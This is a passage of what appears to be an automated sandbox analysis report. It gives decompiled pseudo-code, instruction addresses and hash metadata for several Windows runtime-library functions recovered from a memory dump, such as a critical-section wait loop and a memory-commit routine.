                                                                                                            • Instruction ID: c1595dd22fdc64bd5cd8d612d18156d0944b56dabe1baafc99a2b106e23a5802
                                                                                                            • Opcode Fuzzy Hash: 4b0edc1757c47c83ab21937fd515d430acf61421bb4bf026d6f80d378909b8be
                                                                                                            • Instruction Fuzzy Hash: CFA1D171B0060A9BEB35CB65C851BBABBE5EF48710F1445F9E906DBAD0DB30DD019B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AD2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E00AD2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xbc5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xbc7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00B197C0();
				}
				if( *0xbc79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xbc79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00B01624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00AF7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00B6FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00B19520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00B0E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00B2DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xbc6901;
								_push(_t109);
								_v52 = _t98;
								if( *0xbc6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00B19980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00B195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00AF7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00AF7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00B57016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00B6FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xbc5350;
							if(_t109 != 0xbc5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00B6FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00B65720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                            0x00ad2d8a
                                                                                                            0x00ad2d8a
                                                                                                            0x00ad2d92
                                                                                                            0x00ad2d96
                                                                                                            0x00ad2d9e
                                                                                                            0x00ad2da0
                                                                                                            0x00ad2da3
                                                                                                            0x00ad2da5
                                                                                                            0x00ad2da8
                                                                                                            0x00ad2dab
                                                                                                            0x00ad2db2
                                                                                                            0x00b2f9aa
                                                                                                            0x00b2f9ab
                                                                                                            0x00b2f9ae
                                                                                                            0x00b2f9ae
                                                                                                            0x00ad2db8
                                                                                                            0x00ad2dc2
                                                                                                            0x00b2f9b9
                                                                                                            0x00b2f9be
                                                                                                            0x00b2f9bf
                                                                                                            0x00b2f9bf
                                                                                                            0x00ad2dcf
                                                                                                            0x00b2f9c9
                                                                                                            0x00ad2dd5
                                                                                                            0x00ad2dd5
                                                                                                            0x00ad2dd5
                                                                                                            0x00ad2dde
                                                                                                            0x00ad2de1
                                                                                                            0x00ad2e70
                                                                                                            0x00ad2e72
                                                                                                            0x00ad2e72
                                                                                                            0x00ad2de7
                                                                                                            0x00ad2deb
                                                                                                            0x00ad2e7c
                                                                                                            0x00ad2e83
                                                                                                            0x00ad2e85
                                                                                                            0x00ad2e8b
                                                                                                            0x00ad2e8d
                                                                                                            0x00ad2e92
                                                                                                            0x00ad2e92
                                                                                                            0x00ad2e85
                                                                                                            0x00ad2df1
                                                                                                            0x00ad2df7
                                                                                                            0x00ad2df9
                                                                                                            0x00ad2df9
                                                                                                            0x00ad2dfc
                                                                                                            0x00ad2dff
                                                                                                            0x00ad2e02
                                                                                                            0x00000000
                                                                                                            0x00ad2e05
                                                                                                            0x00ad2e0c
                                                                                                            0x00b2f9d9
                                                                                                            0x00ad2e12
                                                                                                            0x00ad2e12
                                                                                                            0x00ad2e12
                                                                                                            0x00ad2e1a
                                                                                                            0x00b2f9e3
                                                                                                            0x00b2f9e9
                                                                                                            0x00b2f9f0
                                                                                                            0x00b2f9f6
                                                                                                            0x00b2f9f8
                                                                                                            0x00b2f9f8
                                                                                                            0x00b2f9f0
                                                                                                            0x00ad2e23
                                                                                                            0x00b2fa02
                                                                                                            0x00b2fa03
                                                                                                            0x00b2fa05
                                                                                                            0x00b2fa06
                                                                                                            0x00000000
                                                                                                            0x00ad2e29
                                                                                                            0x00ad2e29
                                                                                                            0x00ad2e2e
                                                                                                            0x00ad2e34
                                                                                                            0x00ad2e3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ad2e44
                                                                                                            0x00ad2e47
                                                                                                            0x00ad2e4d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ad2e4f
                                                                                                            0x00ad2e54
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ad2e5a
                                                                                                            0x00ad2e5f
                                                                                                            0x00ad2e9a
                                                                                                            0x00ad2ea4
                                                                                                            0x00ad2ea5
                                                                                                            0x00ad2ea8
                                                                                                            0x00ad2eaf
                                                                                                            0x00ad2eb2
                                                                                                            0x00ad2eb5
                                                                                                            0x00b2fae9
                                                                                                            0x00b2faeb
                                                                                                            0x00b2faed
                                                                                                            0x00b2faef
                                                                                                            0x00b2faf7
                                                                                                            0x00b2faf8
                                                                                                            0x00b2fafd
                                                                                                            0x00b2faff
                                                                                                            0x00b2fb04
                                                                                                            0x00b2fb04
                                                                                                            0x00b2faff
                                                                                                            0x00ad2ec0
                                                                                                            0x00ad2ec4
                                                                                                            0x00ad2ec6
                                                                                                            0x00ad2ec8
                                                                                                            0x00b2fb14
                                                                                                            0x00b2fb18
                                                                                                            0x00b2fb1e
                                                                                                            0x00b2fb21
                                                                                                            0x00b2fb21
                                                                                                            0x00ad2ece
                                                                                                            0x00ad2ece
                                                                                                            0x00ad2ece
                                                                                                            0x00ad2ed7
                                                                                                            0x00ad2e61
                                                                                                            0x00ad2e63
                                                                                                            0x00b2fa6b
                                                                                                            0x00b2fa71
                                                                                                            0x00b2fa76
                                                                                                            0x00b2fa78
                                                                                                            0x00b2fa8a
                                                                                                            0x00b2fa7a
                                                                                                            0x00b2fa83
                                                                                                            0x00b2fa83
                                                                                                            0x00b2fa8f
                                                                                                            0x00b2fa91
                                                                                                            0x00b2fa97
                                                                                                            0x00b2fa9d
                                                                                                            0x00b2faa4
                                                                                                            0x00b2faaa
                                                                                                            0x00b2faaf
                                                                                                            0x00b2fab1
                                                                                                            0x00b2fac3
                                                                                                            0x00b2fab3
                                                                                                            0x00b2fabc
                                                                                                            0x00b2fabc
                                                                                                            0x00b2fac8
                                                                                                            0x00b2facb
                                                                                                            0x00b2fadf
                                                                                                            0x00b2fadf
                                                                                                            0x00b2facb
                                                                                                            0x00b2faa4
                                                                                                            0x00b2fa91
                                                                                                            0x00ad2e6f
                                                                                                            0x00ad2e6f
                                                                                                            0x00ad2e5f
                                                                                                            0x00b2fa13
                                                                                                            0x00b2fa15
                                                                                                            0x00b2fa17
                                                                                                            0x00b2fa1f
                                                                                                            0x00b2fa21
                                                                                                            0x00b2fa22
                                                                                                            0x00b2fa25
                                                                                                            0x00b2fa28
                                                                                                            0x00b2fa2f
                                                                                                            0x00b2fa2f
                                                                                                            0x00b2fa2a
                                                                                                            0x00b2fa2a
                                                                                                            0x00b2fa2a
                                                                                                            0x00b2fa31
                                                                                                            0x00b2fa34
                                                                                                            0x00b2fa36
                                                                                                            0x00b2fa3c
                                                                                                            0x00b2fa3e
                                                                                                            0x00b2fa41
                                                                                                            0x00b2fa43
                                                                                                            0x00b2fa45
                                                                                                            0x00b2fa45
                                                                                                            0x00b2fa41
                                                                                                            0x00b2fa3c
                                                                                                            0x00b2fa4a
                                                                                                            0x00b2fa4f
                                                                                                            0x00b2fa51
                                                                                                            0x00b2fa53
                                                                                                            0x00b2fa56
                                                                                                            0x00b2fa5b
                                                                                                            0x00b2fa5e
                                                                                                            0x00000000
                                                                                                            0x00b2fa5e
                                                                                                            0x00ad2e23

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RTL: Re-Waiting
                                                                                                            • API String ID: 0-316354757
                                                                                                            • Opcode ID: 21d7100b468d2cb01ca5cff7158ad87d1f87c3e42db0ab6778fe4216b946b33f
                                                                                                            • Instruction ID: 86b7364c5025bfadebe784dbe18c013b8f472a3dddb96f5a76b8760c660cdfc9
                                                                                                            • Opcode Fuzzy Hash: 21d7100b468d2cb01ca5cff7158ad87d1f87c3e42db0ab6778fe4216b946b33f
                                                                                                            • Instruction Fuzzy Hash: F8613031A04656AFDB21DB68D880B7EBBF1EB55710F2406FAE85AA73C1CB349D41C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00BA0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00B9FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00BA1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00B19730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00B9A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00B9A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xbc8b04 >> 0x14) + (_v44 -  *0xbc8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00AF7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00B9138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00AF7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00B8FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xbc8724 & 0x00000008) != 0) {
						E00B952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00BA15B5(0xbc8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                            0x00ba0eb7
                                                                                                            0x00ba0eb9
                                                                                                            0x00ba0ec0
                                                                                                            0x00ba0ec2
                                                                                                            0x00ba0ecd
                                                                                                            0x00ba105b
                                                                                                            0x00ba105b
                                                                                                            0x00ba1061
                                                                                                            0x00ba1066
                                                                                                            0x00ba1066
                                                                                                            0x00ba106b
                                                                                                            0x00ba1073
                                                                                                            0x00ba1073
                                                                                                            0x00ba0ed3
                                                                                                            0x00ba0ed6
                                                                                                            0x00ba0edc
                                                                                                            0x00ba0ee0
                                                                                                            0x00ba0ee7
                                                                                                            0x00ba0ef0
                                                                                                            0x00ba0ef5
                                                                                                            0x00ba0efa
                                                                                                            0x00ba0efc
                                                                                                            0x00ba0efd
                                                                                                            0x00ba0f03
                                                                                                            0x00ba0f04
                                                                                                            0x00ba0f06
                                                                                                            0x00ba0f07
                                                                                                            0x00ba0f09
                                                                                                            0x00ba0f0e
                                                                                                            0x00ba0f14
                                                                                                            0x00ba0f23
                                                                                                            0x00ba0f2d
                                                                                                            0x00ba0f34
                                                                                                            0x00ba0f34
                                                                                                            0x00ba0f14
                                                                                                            0x00ba0f52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ba0f58
                                                                                                            0x00ba0f73
                                                                                                            0x00ba0f74
                                                                                                            0x00ba0f79
                                                                                                            0x00ba0f7d
                                                                                                            0x00ba0f80
                                                                                                            0x00ba0f86
                                                                                                            0x00ba0fab
                                                                                                            0x00ba0fb5
                                                                                                            0x00ba0fc6
                                                                                                            0x00ba0fd1
                                                                                                            0x00ba0fe3
                                                                                                            0x00ba0fd3
                                                                                                            0x00ba0fdc
                                                                                                            0x00ba0fdc
                                                                                                            0x00ba0feb
                                                                                                            0x00ba1009
                                                                                                            0x00ba1009
                                                                                                            0x00ba1015
                                                                                                            0x00ba1027
                                                                                                            0x00ba1017
                                                                                                            0x00ba1020
                                                                                                            0x00ba1020
                                                                                                            0x00ba102f
                                                                                                            0x00ba103c
                                                                                                            0x00ba103c
                                                                                                            0x00ba1048
                                                                                                            0x00ba1050
                                                                                                            0x00ba1050
                                                                                                            0x00ba1055
                                                                                                            0x00000000
                                                                                                            0x00ba1055
                                                                                                            0x00ba0f88
                                                                                                            0x00ba0f9e
                                                                                                            0x00ba0fa2
                                                                                                            0x00ba0fa9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ba0fa9
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `
                                                                                                            • API String ID: 0-2679148245
                                                                                                            • Opcode ID: 21846c0ffa1291f473166fcb018c82cc4e6d4742917b9be00281a10e29ac8773
                                                                                                            • Instruction ID: 356f5cbb8448f44cfc46af8a5ece0fb34c01389fdf2cff550c58b626809c5967
                                                                                                            • Opcode Fuzzy Hash: 21846c0ffa1291f473166fcb018c82cc4e6d4742917b9be00281a10e29ac8773
                                                                                                            • Instruction Fuzzy Hash: 2651ED702083829FD725DF28D981B2BB7E5EBC5310F0449ACF99297291D771EC45CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B0F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00B0F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00AF4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00B19830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00B19990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00B195D0();
							goto L11;
						} else {
							_t109 = L00AF4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00B1F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00B195D0();
										L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                            0x00b0f0d3
                                                                                                            0x00b0f0d9
                                                                                                            0x00b0f0e0
                                                                                                            0x00b0f0e7
                                                                                                            0x00b0f0f2
                                                                                                            0x00b0f0f4
                                                                                                            0x00b0f0f8
                                                                                                            0x00b0f100
                                                                                                            0x00b0f108
                                                                                                            0x00b0f10d
                                                                                                            0x00b0f115
                                                                                                            0x00b0f116
                                                                                                            0x00b0f11f
                                                                                                            0x00b0f123
                                                                                                            0x00b0f124
                                                                                                            0x00b0f12c
                                                                                                            0x00b0f130
                                                                                                            0x00b0f134
                                                                                                            0x00b0f13d
                                                                                                            0x00b0f144
                                                                                                            0x00b0f14b
                                                                                                            0x00b0f152
                                                                                                            0x00b4bab0
                                                                                                            0x00b4bab0
                                                                                                            0x00b0f158
                                                                                                            0x00b0f158
                                                                                                            0x00b0f15a
                                                                                                            0x00b0f160
                                                                                                            0x00b0f165
                                                                                                            0x00b0f166
                                                                                                            0x00b0f16f
                                                                                                            0x00b0f173
                                                                                                            0x00b4baa7
                                                                                                            0x00b4baa7
                                                                                                            0x00b4baab
                                                                                                            0x00000000
                                                                                                            0x00b0f179
                                                                                                            0x00b0f18d
                                                                                                            0x00b0f191
                                                                                                            0x00b4baa2
                                                                                                            0x00000000
                                                                                                            0x00b0f197
                                                                                                            0x00b0f19b
                                                                                                            0x00b0f1a2
                                                                                                            0x00b0f1a9
                                                                                                            0x00b0f1af
                                                                                                            0x00b0f1b2
                                                                                                            0x00b0f1b6
                                                                                                            0x00b0f1b9
                                                                                                            0x00b0f1c4
                                                                                                            0x00b0f1d8
                                                                                                            0x00b0f1df
                                                                                                            0x00b0f1e3
                                                                                                            0x00b0f1eb
                                                                                                            0x00b0f1ee
                                                                                                            0x00b0f1f4
                                                                                                            0x00b0f20f
                                                                                                            0x00b4bab7
                                                                                                            0x00b4babb
                                                                                                            0x00b4bacc
                                                                                                            0x00b4bad1
                                                                                                            0x00b0f215
                                                                                                            0x00b0f218
                                                                                                            0x00b0f226
                                                                                                            0x00b0f22b
                                                                                                            0x00000000
                                                                                                            0x00b0f22b
                                                                                                            0x00b0f1f6
                                                                                                            0x00b0f1f6
                                                                                                            0x00b0f1f9
                                                                                                            0x00b0f1fb
                                                                                                            0x00b0f1fb
                                                                                                            0x00b0f1f4
                                                                                                            0x00b0f191
                                                                                                            0x00b0f173
                                                                                                            0x00b0f152
                                                                                                            0x00b0f203

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                            • Instruction ID: c9167cc26b173be1828db7fbfdfe7ecab01ae9fb78cc530d08f835f22856488c
                                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                            • Instruction Fuzzy Hash: 44519A71204711AFC320DF68C841A6BBBF8FF48710F008A6EFA9597691E7B4E944CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B53540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00B53540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xbcd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00B10BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00B53706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00B1FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00B53540;
						E00B1FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00B2DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00B60C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00B197C0();
					}
					return E00B1B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00B53971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00B53884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00B1FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00B19650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00B53787(_a4,  &_v352, _t80);
						}
					}
					L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00B195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                            0x00b53552
                                                                                                            0x00b5355a
                                                                                                            0x00b5355d
                                                                                                            0x00b53566
                                                                                                            0x00b53567
                                                                                                            0x00b5357e
                                                                                                            0x00b5358f
                                                                                                            0x00b535a1
                                                                                                            0x00b535a5
                                                                                                            0x00b5366b
                                                                                                            0x00b5366b
                                                                                                            0x00b5366d
                                                                                                            0x00b53672
                                                                                                            0x00b53679
                                                                                                            0x00b53685
                                                                                                            0x00b5368d
                                                                                                            0x00b5369d
                                                                                                            0x00b536a7
                                                                                                            0x00b536b8
                                                                                                            0x00b536c6
                                                                                                            0x00b536c7
                                                                                                            0x00b536dc
                                                                                                            0x00b536e1
                                                                                                            0x00b536e7
                                                                                                            0x00b536e9
                                                                                                            0x00b536e9
                                                                                                            0x00b53703
                                                                                                            0x00b53703
                                                                                                            0x00b535b5
                                                                                                            0x00b535c0
                                                                                                            0x00b535c4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b535ca
                                                                                                            0x00b535d7
                                                                                                            0x00b535e2
                                                                                                            0x00b535e6
                                                                                                            0x00b535e8
                                                                                                            0x00b535f5
                                                                                                            0x00b535fa
                                                                                                            0x00b53603
                                                                                                            0x00b53604
                                                                                                            0x00b53609
                                                                                                            0x00b5360a
                                                                                                            0x00b53612
